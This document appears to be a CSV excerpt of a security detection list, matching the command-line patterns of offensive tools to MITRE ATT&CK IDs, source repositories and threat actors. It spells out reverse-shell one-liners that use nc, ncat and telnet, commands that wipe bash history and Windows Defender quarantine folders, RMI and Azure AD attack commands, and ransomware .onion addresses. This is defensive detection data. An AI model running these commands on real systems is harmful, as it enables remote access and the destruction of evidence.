"*rktazuzi7hbln7sy.onion*",".{0,1000}rktazuzi7hbln7sy\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57333"
"*rlwrap -cAr nc -lvnp *",".{0,1000}rlwrap\s\-cAr\snc\s\-lvnp\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","57335"
"*rlwrap nc -lvnp *",".{0,1000}rlwrap\snc\s\-lvnp\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57336"
"*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | sh -i 2>&1 | nc *",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\s\|\ssh\s\-i\s2\>\&1\s\|\snc\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57342"
"*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc * >/tmp/f*",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|sh\s\-i\s2\>\&1\|nc\s.{0,1000}\s\>\/tmp\/f.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57343"
"*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u * >/tmp/*",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|sh\s\-i\s2\>\&1\|ncat\s\-u\s.{0,1000}\s\>\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57344"
"*rm -f *.o dump_vdso test_payload*",".{0,1000}rm\s\-f\s.{0,1000}\.o\sdump_vdso\stest_payload.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","57349"
"*rm -rf /bin/netstat*",".{0,1000}rm\s\-rf\s\/bin\/netstat.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","#linux","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","57357"
"*rm -rf /tmp/backpipe;mknod /tmp/backpipe p;telnet * 0</tmp/backpipe*",".{0,1000}rm\s\-rf\s\/tmp\/backpipe\;mknod\s\/tmp\/backpipe\sp\;telnet\s.{0,1000}\s0\<\/tmp\/backpipe.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","57358"
"*rm -rf ~/.bash_history*",".{0,1000}rm\s\-rf\s\~\/\.bash_history.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","#linux","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","57362"
"*rmdir C:\ProgramData\Microsoft\Windows Defender\Quarantine\Entries /S*",".{0,1000}rmdir\sC\:\\ProgramData\\Microsoft\\Windows\sDefender\\Quarantine\\Entries\s\/S.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","57364"
"*rmdir C:\ProgramData\Microsoft\Windows Defender\Quarantine\Entries /S*",".{0,1000}rmdir\sC\:\\ProgramData\\Microsoft\\Windows\sDefender\\Quarantine\\Entries\s\/S.{0,1000}","offensive_tool_keyword","rmdir","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","57365"
"*rmdir C:\ProgramData\Microsoft\Windows Defender\Quarantine\ResourceData /S*",".{0,1000}rmdir\sC\:\\ProgramData\\Microsoft\\Windows\sDefender\\Quarantine\\ResourceData\s\/S.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","57366"
"*rmdir C:\ProgramData\Microsoft\Windows Defender\Quarantine\ResourceData /S*",".{0,1000}rmdir\sC\:\\ProgramData\\Microsoft\\Windows\sDefender\\Quarantine\\ResourceData\s\/S.{0,1000}","offensive_tool_keyword","rmdir","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","57367"
"*rmdir C:\ProgramData\Microsoft\Windows Defender\Quarantine\Resources /S*",".{0,1000}rmdir\sC\:\\ProgramData\\Microsoft\\Windows\sDefender\\Quarantine\\Resources\s\/S.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","57368"
"*rmg bind * jmxrmi --bind-objid *",".{0,1000}rmg\sbind\s.{0,1000}\sjmxrmi\s\-\-bind\-objid\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57370"
"*rmg bind *127.0.0.1:*--localhost-bypass*",".{0,1000}rmg\sbind\s.{0,1000}127\.0\.0\.1\:.{0,1000}\-\-localhost\-bypass.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57371"
"*rmg call * --plugin GenericPrint.jar*",".{0,1000}rmg\scall\s.{0,1000}\s\-\-plugin\sGenericPrint\.jar.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57372"
"*rmg call * --signature * --bound-name plain-server*",".{0,1000}rmg\scall\s.{0,1000}\s\-\-signature\s.{0,1000}\s\-\-bound\-name\splain\-server.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57373"
"*rmg codebase *http* --component *",".{0,1000}rmg\scodebase\s.{0,1000}http.{0,1000}\s\-\-component\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57374"
"*rmg codebase *java.util.HashMap *--bound-name legacy-service*",".{0,1000}rmg\scodebase\s.{0,1000}java\.util\.HashMap\s.{0,1000}\-\-bound\-name\slegacy\-service.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57375"
"*rmg enum *",".{0,1000}rmg\senum\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57376"
"*rmg guess * *",".{0,1000}rmg\sguess\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57377"
"*rmg known javax.management.remote.rmi.RMIServerImpl_Stub*",".{0,1000}rmg\sknown\sjavax\.management\.remote\.rmi\.RMIServerImpl_Stub.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57378"
"*rmg listen * CommonsCollections*",".{0,1000}rmg\slisten\s.{0,1000}\sCommonsCollections.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57379"
"*rmg listen 0.0.0.0 *",".{0,1000}rmg\slisten\s0\.0\.0\.0\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57380"
"*rmg objid *[*",".{0,1000}rmg\sobjid\s.{0,1000}\[.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57381"
"*rmg roguejmx *",".{0,1000}rmg\sroguejmx\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57382"
"*rmg scan *",".{0,1000}rmg\sscan\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57383"
"*rmg scan * --ports *",".{0,1000}rmg\sscan\s.{0,1000}\s\-\-ports\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57384"
"*rmg serial * AnTrinh * --component *",".{0,1000}rmg\sserial\s.{0,1000}\sAnTrinh\s.{0,1000}\s\-\-component\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57385"
"*rmg serial *CommonsCollections*",".{0,1000}rmg\sserial\s.{0,1000}CommonsCollections.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57386"
"*rmg-*-jar-with-dependencies.jar*",".{0,1000}rmg\-.{0,1000}\-jar\-with\-dependencies\.jar.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57387"
"*rmg*--yso*",".{0,1000}rmg.{0,1000}\-\-yso.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57388"
"*RMIRegistryExploit.java*",".{0,1000}RMIRegistryExploit\.java.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57389"
"*rmmod diamorphine*",".{0,1000}rmmod\sdiamorphine.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","57392"
"*rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion*",".{0,1000}rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57395"
"*rnsm777cdsjrsdlbs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion*",".{0,1000}rnsm777cdsjrsdlbs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57396"
"*roadrecon auth *",".{0,1000}roadrecon\sauth\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57397"
"*roadrecon dump *",".{0,1000}roadrecon\sdump\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57398"
"*roadrecon gather *",".{0,1000}roadrecon\sgather\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57399"
"*roadrecon plugin *",".{0,1000}roadrecon\splugin\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57400"
"*roadrecon*gather.py*",".{0,1000}roadrecon.{0,1000}gather\.py.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57401"
"*roadrecon.db*",".{0,1000}roadrecon\.db.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","1","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57402"
"*roadrecon/frontend*",".{0,1000}roadrecon\/frontend.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","1","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57403"
"*roadtoken.exe*",".{0,1000}roadtoken\.exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","57404"
"*ROADtools.git*",".{0,1000}ROADtools\.git.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","1","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57405"
"*roadtools.roadlib.auth*",".{0,1000}roadtools\.roadlib\.auth.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57406"
"*roadtools.roadtx.main:main*",".{0,1000}roadtools\.roadtx\.main\:main.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57407"
"*ROADtools-master*",".{0,1000}ROADtools\-master.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","1","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57408"
"*roadtx browserprtinject *",".{0,1000}roadtx\sbrowserprtinject\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57409"
"*roadtx device -a delete *",".{0,1000}roadtx\sdevice\s\-a\sdelete\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57410"
"*roadtx getscope -s*",".{0,1000}roadtx\sgetscope\s\-s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57411"
"*roadtx gettokens -u *",".{0,1000}roadtx\sgettokens\s\-u\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57412"
"*roadtx interactiveauth -c *",".{0,1000}roadtx\sinteractiveauth\s\-c\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57413"
